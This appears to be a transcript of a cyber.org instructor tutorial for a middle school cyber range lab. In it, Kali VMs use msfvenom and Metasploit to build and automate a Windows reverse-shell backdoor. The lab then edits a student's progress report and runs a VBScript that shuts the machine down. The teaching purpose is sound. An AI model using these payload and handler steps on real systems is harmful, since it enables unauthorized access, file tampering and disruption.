cyber.org instructor tutorial. I'm Tessa with cyber.org, and I'm excited to take you through this middle school activity using the cyber.org cyber range. Today, a school's principal wants to know which of her teachers is practicing bad cybersecurity by clicking on suspicious links. We will hone our skills in this exercise by using scripting and automation to quickly create backdoor attacks to find out. As in the name, this type of attack creates a backdoor into another computer, giving a malicious actor unauthorized access to the machine. This could be triggered by simply clicking, downloading, and running files from an unverified source. Creating the backdoor, though, can take a long time and a lot of effort. We'll see in a bit just how much time it takes to write long scripts. This is where automation comes in. Automation lets a process or system function by itself, so if a malicious actor wants to run a backdoor attack on several machines at once, all they need to do is automate the scripts. The principal won't settle for us simply getting into the computer, though. She's sent files to the teachers to store on their computers. These are the files we will access and tamper with as proof that the teacher clicked on a suspicious link. The principal also wants us to shut down the teacher's machine to show them how bad the attack could have been. Let's get into the range to show our teachers why practicing good cybersecurity is so important. First, log in by going to apps.cyber.org. For your convenience, right-click on the Page tab and select Duplicate. In one tab, fire up the Kali Linux VM. In the other, fire up the Windows 7 VM. This will make it easier to switch between machines during the activity. The VMs can take a few minutes to load, so it's advisable to have them loaded up before getting to this part of the activity. We also advise keeping a scratch piece of paper to write down your Kali IP address. We'll work in the Kali VM first, so open that up. Open a terminal by clicking the black box in the top left corner of the screen. Make sure to write down your IP address, which is listed in the name of the machine. First, create the payload. This is the part of our backdoor attack that will carry out the malicious action once we're inside of the target system. The command is lengthy, but type it all on one line and don't hit enter until you're done. MSF Venom space -A space x86 space -- platform space Windows space -P space Windows /shell /reverse _TCP space lhost =, enter your Kali IP address here, space lport =, 4444 space -B space quote \x00 quote space -E space x86 /SHIKATA _GA _NAI space -F space EXE space angled bracket space hello world.exe. Hit enter. This will take a moment to finish. Next, type the command sudo space mv space hello world.exe space /var /www /HTML. Hit enter. Then type web server _start and hit enter. Now, We'll start Metasploit to set up the backdoor connection to the Windows 7 VM. First, type sudo space msf console and hit enter. It will take a moment for Metasploit to start. Once it has started, type the following commands: use space exploit / multi / handler. Set space payload space Windows / shell / reverse _ TCP. Set space lhost space your Kali IP address. Set space lport space 4444. Run. Now that the backdoor is set up, let's switch to the Windows 7 VM. In this machine, we are acting as one of the teachers and will fall victim to the attack. In Windows, open Internet Explorer. If a prompt appears, you can click Ask Me Later. In the address bar, enter your Kali IP address / helloworld.exe and hit enter. Two message boxes will appear. Even though the second box warns you that the publisher of the file is unknown, click Run on both. Go back to the Kali Linux VM. You will see that the command line in the terminal has changed. It should now show a command line for the Windows 7 VM. Since the teacher ran the file that opened a backdoor into their system, we are now operating inside the Windows 7 VM from the Kali Linux VM. Our backdoor attack was a success. Let's use scripting to make the attack faster. Close the current terminal window and open a new one. Change directories by using the command cd space course files / range activities / Scripticious Malicious. Hit enter. Open the existing Mali script with the nano editor by typing nano space Mali script. Using the arrow keys on your keyboard, move the cursor to where the IP address reads hostname-i in parentheses. Change it to your Kali IP address. Then, arrow down to the echo set lhost line of the script and change that hostname-i to your Kali address as well. Note that the name of the executable file this time is lottery.exe and the port listening for a Windows machine is 5555. Save and close this by pressing Ctrl-X, hit Y, and hit Enter. Back on the command line, type sudo space chmod space +x space Mali script and hit enter. Then type sudo space period / Mali script and hit enter. Go to the Windows 7 VM again to fall victim to the attack as the teacher. Internet Explorer should still be open, but this time type your IP address / lottery.exe into the address bar. Click Run on both pop-up windows again. Once you go back to the Kali Linux VM, you should see that you've made it into the Windows VM again. Because we had the script for the attack pre-written and automated, it happened more quickly. Let's run this attack one more time, even faster. In the Kali Linux VM, close out of the terminal window and open another. All we need to do this time is type sudo space period / Maliscript, and hit Enter to do it all over again. Go back to the Windows 7 VM and act as the teacher. Again, type your IP address /lottery.exe into the address bar, and then run on the pop-up windows. Go back to the Kali Linux VM, and we should be inside the Windows VM again. We've accomplished the first part of the principal's investigation. Since we're inside the Windows VM, we will have to use different commands to reach the files we'll tamper with. Use the command dir here to see that there are no files on the desktop. Move up one directory level with cd /:. Use dir again to find that there are files here. Move to the Documents directory with cd / documents, being sure to use proper capitalization. You should see a Range Activities directory here as well. To look in this directory, use cd /range activities . Make sure to use the quotation marks since the file name has a space in it. Now, use cd student progress reports to see what's here. These are the files the principal mentioned. She asked us to change the progress report of a student who's been in some trouble. We'll use the type command to see what the text files say. Look at Emily Abernathy's file with type Emily Abernathy.txt . Look at Janie's next with type Janie doe.txt . You should see that Janie is not having the best year, which means that this is the file the principal wants us to change. To change the text in the file, type echo Janie is exceeding expectations in all areas, angled bracket, Janie doe.txt . Use type Janie doe.txt to make sure we successfully change the file. For the final part of the principal's request, let's write a script that will send the Windows user a message and then shut down the machine. First, write the script as a text file. The first line will look like this: echo set obj shell create object parentheses w script dot shell parentheses angled bracket Windows script .txt. Then we'll add to what we've created by typing echo obj shell dot popup I changed your file comma 0 comma message comma 64 two angled brackets Windows script .txt. Finally, for line 3, we'll type echo obj shell run space quote shutdown .exe space /p quote comma space 0 comma space true space 2 angled brackets space Windows script .txt. You can take a moment here to check your work and make sure everything looks right. To do this, we'll switch to the Windows VM, open the File Explorer, and navigate to the file. Once you've double-checked your work, go to the Kali Linux VM and we'll change the file extension to run the script. Type the command ren space Windows script .txt space Windows script .vbs. All we need to do now is call the script with Windows script .vbs. Switch back to experience what you've made as the teacher. If you have other windows open, close them to find the message box. Once you find it, click OK and watch the script work its magic. This is how automation lets malicious actors use backdoor attacks to target lots of people at once with ease. It is a good reminder to verify that we're clicking links and downloading materials from a trusted source, or we just might have malicious actors changing our files without our knowledge. Thank you for joining me for this instructor tutorial. For more like this and other cybersecurity resources, be sure to check out cyber.org.